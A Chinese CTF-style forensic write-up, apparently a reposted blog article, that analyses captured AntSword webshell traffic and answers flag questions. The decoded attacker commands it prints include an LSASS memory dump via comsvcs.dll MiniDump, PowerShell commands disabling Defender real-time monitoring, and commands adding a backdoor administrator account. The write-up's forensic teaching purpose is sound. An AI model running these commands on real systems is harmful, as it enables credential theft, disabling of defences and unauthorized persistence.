专栏名称: 衡阳信安
船山院士网络安全团队唯一公众号,为国之安全而奋斗,为信息安全而发声!
目录
相关文章推荐
江南晚报  ·  客运版S2线,即将开通! ·  昨天  
新闻晨报  ·  频繁失误被陈凯歌怒批,他发长文致歉 ·  昨天  
新华社  ·  干净又省钱!最全冬装清洗攻略来了→ ·  3 天前  
51好读  ›  专栏  ›  衡阳信安

玄机 流量分析篇

衡阳信安  · 公众号  ·  · 2024-08-25 00:00

主要观点总结

该文章主要介绍了流量特征分析,特别是针对蚁剑流量的解密,以及从解密的数据中获取关键信息的过程。涉及多个flag的获取,包括连接密码、执行命令、读取文件、上传文件、下载文件等。

关键观点总结

关键观点1: 蚁剑流量的解密

文章介绍了如何对蚁剑流量进行解密,包括解密过程中涉及的各种命令和数据包。

关键观点2: 获取flag1:管理员Admin账号的密码

通过解密数据,得到管理员Admin的密码。

关键观点3: 获取flag2:LSASS.exe的程序进程ID

寻找下载LSASS.exe进程的数据包,从中获取进程ID。

关键观点4: 获取flag3:用户WIN0101的密码

通过导出HTTP对象,找到最大的文件,使用mimikatz解密得到用户WIN0101的密码。

关键观点5: 总结

文章总结了整个过程中的关键步骤和注意事项,强调了此靶机的考察点以及需要掌握的技能。


正文

第六章 流量特征分析-蚁剑流量分析

flag1 : ⽊⻢的连接密码是什么
flag2 : ⿊客执⾏的第⼀个命令是什么
flag3 : ⿊客读取了哪个⽂件的内容,提交⽂件绝对路径
flag4 : ⿊客上传了什么⽂件到服务器,提交⽂件名
flag5 : ⿊客上传的⽂件内容是什么
flag6 : ⿊客下载了哪个⽂件,提交⽂件绝对路径

在正式做题之前,我们先对蚁剑的流量进⾏解密:

cd "/var/www/html";id;echo e124bc;pwd;echo 43523
cd "/var/www/html";ls;echo e124bc;pwd;echo 43523
cd "/var/www/html";cat /etc/passwd;echo e124bc;pwd;echo 43523 .
/var/www/html/flag.txt .
/var/www/html/7
/var/www/html/config.php

flag1:⽊⻢的连接密码是什么 我们随便找个数据包,查看连接密码:




flag2:⿊客执⾏的第⼀个命令是什么 将第⼀个数据包中的特定字段,从第⼆位索引开始 base64 解密:

flag3:⿊客读取了哪个⽂件的内容,提交⽂件绝对路径 在上⾯我们解密的流量中,可以看到 cat /etc/passwd 这个读取⽂件的命令。追踪流,验证是否读取成功:

flag4:⿊客⻓传了什么⽂件到服务器,提交⽂件名 蚁剑上传⽂件到服务器,默认对⽂件内容进⾏⼗六进制编码,找到对应的数据包:


flag5:⿊客上传的⽂件内容是什么 对上⾯的内容进⾏⼗六进制解码即可:

flag{write_flag}

flag6:⿊客下载了哪个⽂件,提交⽂件绝对路径 在上⾯的解密后的数据中,只有最后两个最可疑,观察,两个请求包及返回包:


flag{/var/www/html/config.php}

总结:此靶机考察对蚁剑流量的解密,对蚁剑默认未编码的流量有⼀定的认知。

第六章 流量特征分析-蚂蚁爱上树

在此之前,先对蚁剑流量进⾏解密:

cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&ls&echo [S]&cd&echo [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /priv&echo [S]&cd&ec
ho [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&systeminfo&echo [S]&cd&ech
o [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\&echo [S]&cd&echo
[E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&ech
o [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain group" /d
omain&echo [S]&cd&echo [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net group "domain admins" /
domain&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net view&echo [S]&cd&echo
[E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net share&echo [S]&cd&echo
[E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:\Temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&ech
o [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&ech
o [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"© store.php c:\temp&ech
o [S]&cd&echo [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&ech
o [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRaltimeMonitoring $true&echo [S]&cd&echo [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Set-M
ppreference -DisableRealtimeMonitoring $true&echo [S]&cd&echo [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&powershell -ep bypass Get-M
pComputerStatus&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&rundll32.exe comsvcs.dll, M
iniDump 852 C:\temp\OnlineShopBackup.zip full&echo [S]&cd&echo [E]
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\temp&echo [S]&cd&ech
o [E]7
cd /d "C:/phpStudy/PHPTutorial/WWW/onlineshop"&dir c:\windows\system32&echo
[S]&cd&echo [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&dir c:\windows\config&echo
[S]&cd&echo [E]
7
flag1:管理员Admin账号的密码是多少
从解密数据中,得到管理员Admin的密码:
flag2:LSASS.exe的程序进程ID是多少
我们寻找下载这个进程的数据包:
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user admin Password1 /a
dd&echo [S]&cd&echo [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrato
rs admin /add&echo [S]&cd&echo [E] .
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net user&echo [S]&cd&echo
[E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&net localgroup administrato
rs&echo [S]&cd&echo [E]7
cd /d "C:\\phpStudy\\PHPTutorial\\WWW\\onlineshop"&whoami /all&echo [S]&cd&ech
o [E]7

flag1:管理员Admin账号的密码是多少 从解密数据中,得到管理员Admin的密码:

flag{Password1}

flag2:LSASS.exe的程序进程ID是多少 我们寻找下载这个进程的数据包:







请到「今天看啥」查看全文